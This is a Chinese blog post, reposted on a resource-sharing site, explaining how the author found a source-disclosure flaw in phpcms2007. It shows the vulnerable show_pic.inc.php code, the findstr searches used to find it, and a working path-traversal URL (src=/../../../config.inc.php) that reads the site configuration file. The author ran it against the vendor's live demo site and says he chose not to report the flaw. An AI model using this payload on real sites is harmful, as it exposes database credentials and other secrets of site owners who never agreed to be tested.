也想出现在这里? 联系我们

关于简单的php源代码泄露漏洞的发掘

作者 : 小编 本文共1877个字,预计阅读时间需要5分钟 发布时间: 2021-06-1 共2.16K人阅读
也想出现在这里? 联系我们

我们知道在asp中出现得最多的还是sql注入,不过在php中由于magic_quotes_gpc为on的情况下特殊字符会被转义,所以即使有很多时候存在sql注入也无法利用。但是php强大的文件操作功能却使我们能体会到在asp中无法体会的乐趣,我想php自带的文件操作函数能让你为之心跳加快~~嘿嘿

这次我发掘的是phpcms2007的源代码泄露漏洞

再次向Phpcms2007的开源行为致敬!!

开始吧,

findstr /s /n /i readfile *.php >readfile.txt (结果我只给出有用的)

其他的文件操作函数可以自己定义查找

module\\picture\\show_pic.inc.php:8:readfile($file);

跟进这个文件看看吧,呵呵,比较小,我喜欢

[Copy to clipboard] [ – ]CODE:

<?php

defined(’IN_PHPCMS’) or exit(’Access Denied’);

require PHPCMS_ROOT.’/module/’.$mod.’/include/common.inc.php’;

isset($src) or exit;

$file = PHPCMS_ROOT.’/’.$PHPCMS[’uploaddir’].’/’.$CHA[’channeldir’].’/’.$MOD[’upload_dir’].’/’.$src;

if(empty($PHP_REFERER) || !strpos($PHP_REFERER, $PHP_DOMAIN)) $file = PHPCMS_ROOT.’/images/error.jpg’;

header("Content-type:image/pjpeg");

readfile($file);

?>

一路分析下。。。

先包含文件/module/’.$mod.’/include/common.inc.php

如果存在变量$src则赋予它路径并把值交给变量$file

然后就是就进入if

这里我不看其他的文件简单猜测下应该是判断url路径来源,也就是防盗链的功能

然后就header()一个图片头

呵呵,轻轻松松就readfile($file);

可以看出它没有判断$src的文件类型,如果我们提交一个src=*.php也会被readfile

好吧,在这里漏洞是出现了

不过由于“defined(’IN_PHPCMS’) or exit(’Access Denied’);”,所以我们是无法直接利用这个漏洞文件的

只能是在其他包含这个文件的php文件中利用

继续吧

[Copy to clipboard] [ – ]CODE:

findstr /s /i /n show_pic.inc.php *.php >show_pic.inc.php.txt

picture\\show_pic.php:4:require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php";

进去看看

[Copy to clipboard] [ – ]CODE:

<?php

require "./config.inc.php";

require "../include/common.inc.php";

require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php";

?>

呵呵,要是register_globals为on的话就可以直接利用这个文件读取目标文件了

那就测试吧

官方是演示站是

[Copy to clipboard] [ – ]CODE:

http://demo.phpcms.cn/

那就这样构造url

[Copy to clipboard] [ – ]CODE:

/picture/show_pic.php?src=/../../../config.inc.php

嘿嘿,读取的就是网站的配置文件

直接访问

[Copy to clipboard] [ – ]CODE:

http://demo.phpcms.cn//picture/show_pic.php?src=/../../../config.inc.php

呵呵,猜测没错!!

那我们可以先访问http://demo.phpcms.cn/抓包

用nc发包

get选项就设置为

[Copy to clipboard] [ – ]CODE:

/picture/show_pic.php?src=/../../../config.inc.php

这里我就用刺猬的一个post提交工具代替了

测试结果如图

ok,就分析到这里了

希望大家不要利用这个做违法的事,嘿嘿!!

偶是坏孩子,不通知官方了~·好孩子去通知下。

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 关于简单的php源代码泄露漏洞的发掘

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录